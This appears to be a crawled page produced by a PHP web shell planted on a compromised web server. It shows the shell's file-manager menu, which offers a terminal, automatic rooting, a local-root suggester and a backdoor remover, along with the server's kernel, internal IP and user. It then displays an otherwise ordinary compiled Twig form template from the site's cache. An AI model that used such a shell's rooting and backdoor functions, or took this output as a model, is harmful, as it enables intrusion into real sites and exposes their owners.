Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
05 /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
050464237f4a6bb5fad296ceb8da00d7.php
3.01
KB
-rwxrwxr-x
2026-05-18 12:54
051e1eb7a504b8b7c3542f1353d2e0a7.php
8.83
KB
-rwxrwxr-x
2026-05-18 12:54
0560a6b93c8e5093d34e4d408e123838.php
16.53
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @SonataAdmin/Form/filter_admin_fields.html.twig */ class __TwigTemplate_d708a306a9720838530f2bb5a23786f4 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->blocks = [ 'choice_widget_collapsed' => [$this, 'block_choice_widget_collapsed'], 'textarea_widget' => [$this, 'block_textarea_widget'], 'form_widget_simple' => [$this, 'block_form_widget_simple'], 'choice_widget_expanded' => [$this, 'block_choice_widget_expanded'], 'checkbox_widget' => [$this, 'block_checkbox_widget'], 'sonata_type_model_autocomplete_widget' => [$this, 'block_sonata_type_model_autocomplete_widget'], ]; } protected function doGetParent(array $context): bool|string|Template|TemplateWrapper { // line 12 return "form_div_layout.html.twig"; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; $this->parent = $this->load("form_div_layout.html.twig", 12); yield from $this->parent->unwrap()->yield($context, array_merge($this->blocks, $blocks)); } // line 18 /** * @return iterable<null|scalar|\Stringable> */ public function block_choice_widget_collapsed(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 19 yield " "; $context["attr"] = Twig\Extension\CoreExtension::merge(($context["attr"] ?? null), ["class" => (((CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", true, true, false, 19)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", false, false, false, 19), "")) : ("")) . " form-control")]); // line 20 yield " "; yield from $this->yieldParentBlock("choice_widget_collapsed", $context, $blocks); yield " "; yield from []; } // line 23 /** * @return iterable<null|scalar|\Stringable> */ public function block_textarea_widget(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 24 yield " "; $context["attr"] = Twig\Extension\CoreExtension::merge(($context["attr"] ?? null), ["class" => (((CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", true, true, false, 24)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", false, false, false, 24), "")) : ("")) . " form-control")]); // line 25 yield " "; yield from $this->yieldParentBlock("textarea_widget", $context, $blocks); yield " "; yield from []; } // line 28 /** * @return iterable<null|scalar|\Stringable> */ public function block_form_widget_simple(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 29 yield " "; $context["attr"] = Twig\Extension\CoreExtension::merge(($context["attr"] ?? null), ["class" => (((CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", true, true, false, 29)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", false, false, false, 29), "")) : ("")) . " form-control")]); // line 30 yield " "; yield from $this->yieldParentBlock("form_widget_simple", $context, $blocks); yield " "; yield from []; } // line 33 /** * @return iterable<null|scalar|\Stringable> */ public function block_choice_widget_expanded(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 34 yield " "; $context["label_attr"] = Twig\Extension\CoreExtension::merge(($context["label_attr"] ?? null), ["class" => ((CoreExtension::getAttribute($this->env, $this->source, ($context["label_attr"] ?? null), "class", [], "any", true, true, false, 34)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["label_attr"] ?? null), "class", [], "any", false, false, false, 34), "")) : (""))]); // line 35 yield " "; $context["label_attr"] = Twig\Extension\CoreExtension::merge(($context["label_attr"] ?? null), ["class" => ((CoreExtension::getAttribute($this->env, $this->source, ($context["label_attr"] ?? null), "class", [], "any", false, false, false, 35) . " ") . (((array_key_exists("widget_type", $context) && (($context["widget_type"] ?? null) != ""))) ? ((((((($tmp = ($context["multiple"] ?? null)) && $tmp instanceof Markup ? (string) $tmp : $tmp)) ? ("checkbox") : ("radio")) . "-") . ($context["widget_type"] ?? null))) : ("")))]); // line 36 yield " "; if ((($tmp = ($context["expanded"] ?? null)) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 37 yield " "; $context["attr"] = Twig\Extension\CoreExtension::merge(($context["attr"] ?? null), ["class" => ((CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", true, true, false, 37)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "class", [], "any", false, false, false, 37), "")) : (""))]); // line 38 yield " <div "; yield from $this->unwrap()->yieldBlock("widget_container_attributes", $context, $blocks); yield "> "; } // line 40 yield " "; $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["form"] ?? null)); foreach ($context['_seq'] as $context["_key"] => $context["child"]) { // line 41 yield " "; if ((array_key_exists("widget_type", $context) && (($context["widget_type"] ?? null) != "inline"))) { // line 42 yield " <div class=\""; yield (((($tmp = ($context["multiple"] ?? null)) && $tmp instanceof Markup ? (string) $tmp : $tmp)) ? ("checkbox") : ("radio")); yield "\"> "; } // line 44 yield " <label"; $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["label_attr"] ?? null)); foreach ($context['_seq'] as $context["attrname"] => $context["attrvalue"]) { yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($context["attrname"], "html", null, true); yield "=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($context["attrvalue"], "html", null, true); yield "\""; } $_parent = $context['_parent']; unset($context['_seq'], $context['attrname'], $context['attrvalue'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; yield "> "; // line 45 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock($context["child"], 'widget', ["attr" => ["class" => ((CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "widget_class", [], "any", true, true, false, 45)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["attr"] ?? null), "widget_class", [], "any", false, false, false, 45), "")) : (""))]]); yield " "; // line 46 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\TranslationExtension']->trans(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, $context["child"], "vars", [], "any", false, false, false, 46), "label", [], "any", false, false, false, 46), [], ($context["translation_domain"] ?? null)), "html", null, true); yield " </label> "; // line 48 if ((array_key_exists("widget_type", $context) && (($context["widget_type"] ?? null) != "inline"))) { // line 49 yield " </div> "; } // line 51 yield " "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['child'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 52 yield " "; if ( $this->unwrap()->hasBlock("form_message", $context, $blocks)) { // line 53 yield " "; yield from $this->unwrap()->yieldBlock("form_message", $context, $blocks); yield " "; } // line 55 yield " "; if ((($tmp = ($context["expanded"] ?? null)) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 56 yield " </div> "; } yield from []; } // line 60 /** * @return iterable<null|scalar|\Stringable> */ public function block_checkbox_widget(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 61 yield " "; if (( !(($context["label"] ?? null) === false) && Twig\Extension\CoreExtension::testEmpty(($context["label"] ?? null)))) { // line 62 yield " "; $context["label"] = $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->humanize(($context["name"] ?? null)); // line 63 yield " "; } // line 64 yield " "; if (((CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 64) != null) && !CoreExtension::inFilter("choice", CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 64), "vars", [], "any", false, false, false, 64), "block_prefixes", [], "any", false, false, false, 64)))) { // line 65 yield " <div class=\"checkbox\"> "; } // line 67 yield " "; // line 68 if ((((CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 68) != null) && !CoreExtension::inFilter("choice", CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 68), "vars", [], "any", false, false, false, 68), "block_prefixes", [], "any", false, false, false, 68))) && array_key_exists("label_render", $context))) { // line 69 yield " <label class=\""; if ((array_key_exists("inline", $context) && ($context["inline"] ?? null))) { yield "checkbox-inline"; } yield "\"> "; } // line 71 yield " <input type=\"checkbox\" "; // line 72 yield from $this->unwrap()->yieldBlock("widget_attributes", $context, $blocks); if (array_key_exists("value", $context)) { yield " value=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["value"] ?? null), "html", null, true); yield "\""; } if ((($tmp = ($context["checked"] ?? null)) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { yield " checked=\"checked\""; } yield "/> "; // line 73 if (((CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 73) != null) && !CoreExtension::inFilter("choice", CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 73), "vars", [], "any", false, false, false, 73), "block_prefixes", [], "any", false, false, false, 73)))) { // line 74 yield " "; if ((array_key_exists("label_render", $context) && CoreExtension::inFilter(($context["widget_checkbox_label"] ?? null), ["both", "widget"]))) { // line 75 yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\TranslationExtension']->trans(($context["label"] ?? null), [], ($context["translation_domain"] ?? null)), "html", null, true); yield " </label> "; } // line 78 yield " "; } // line 79 yield " "; if (((CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 79) != null) && !CoreExtension::inFilter("choice", CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "parent", [], "any", false, false, false, 79), "vars", [], "any", false, false, false, 79), "block_prefixes", [], "any", false, false, false, 79)))) { // line 80 yield " </div> "; // line 81 if ( $this->unwrap()->hasBlock("form_message", $context, $blocks)) { // line 82 yield " "; yield from $this->unwrap()->yieldBlock("form_message", $context, $blocks); yield " "; } // line 84 yield " "; } yield from []; } // line 87 /** * @return iterable<null|scalar|\Stringable> */ public function block_sonata_type_model_autocomplete_widget(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 88 yield " "; yield from $this->load(($context["template"] ?? null), 88)->unwrap()->yield($context); yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@SonataAdmin/Form/filter_admin_fields.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 298 => 88, 291 => 87, 285 => 84, 279 => 82, 277 => 81, 274 => 80, 271 => 79, 268 => 78, 261 => 75, 258 => 74, 256 => 73, 244 => 72, 241 => 71, 233 => 69, 231 => 68, 228 => 67, 224 => 65, 221 => 64, 218 => 63, 215 => 62, 212 => 61, 205 => 60, 198 => 56, 195 => 55, 189 => 53, 186 => 52, 180 => 51, 176 => 49, 174 => 48, 169 => 46, 165 => 45, 149 => 44, 143 => 42, 140 => 41, 135 => 40, 129 => 38, 126 => 37, 123 => 36, 120 => 35, 117 => 34, 110 => 33, 102 => 30, 99 => 29, 92 => 28, 84 => 25, 81 => 24, 74 => 23, 66 => 20, 63 => 19, 56 => 18, 45 => 12,); } public function getSourceContext(): Source { return new Source("", "@SonataAdmin/Form/filter_admin_fields.html.twig", "/var/www/v3.cesa.co.za/vendor/sonata-project/admin-bundle/src/Resources/views/Form/filter_admin_fields.html.twig"); } }